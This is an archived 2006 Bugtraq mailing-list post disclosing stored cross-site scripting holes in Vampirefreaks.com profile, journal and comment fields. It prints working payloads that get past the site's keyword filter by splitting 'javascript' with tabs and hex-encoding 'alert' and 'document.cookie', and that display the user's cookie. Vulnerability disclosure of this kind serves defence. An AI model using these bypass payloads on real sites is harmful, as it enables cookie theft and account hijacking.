Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Vampirefreaks.com - XSS with cookie disclosure

From: luny () youfucktard com
Date: 11 Jun 2006 10:20:49 -0000
Vampirefreaks.com

Homepage:
http://www.vampirefreaks.com

Effected files:
input boxes of editing your profile
posting a journal entry.
Commenting

XSS Vulnerability:

Data isn't properly filtered when editing your profile. One way to bypass the filter is to escape quotes and useclosing 
 brackets withaimg tag while having tab enabled and spacing jav    ascript:  Javascript and alert are filtered to the 
words  "forbidden" so to bypass this we convert the word alert to hex form. Try adding the following below in your 
profile:

']"]'][""]'][IMG SRC="jav       ascript:%61%6C%65%72%74('XSS');"]['["[""]['[""] 

XSS Vulnerability to disclose user cookie:

This time, much like the sameway above, we have to hex encode alert and document.cookie because both words also  get 
filtered to forbidden. PoC, add this in your profile, and make sure tab is on.
PoC:
']"]'][""]'][IMG SRC="jav       ascript:%61%6C%65%72%74(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65)" ]['["[""]['[""] 

-------------------------------

XSS Vuln to disclose cookie in posting a journal entry:

Same method as above works here too:

']"]'][""]'][IMG SRC="jav       ascript:%61%6C%65%72%74(%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65)" ]['["[""]['[""] 

----------------------------------

Screenshots of XSS vulns:

http://www.youfucktard.com/xsp/vf1.jpg
http://www.youfucktard.com/xsp/vf2.jpg
http://www.youfucktard.com/xsp/vf3.jpg
Previous By Date Next
Previous By Thread Next

Current thread: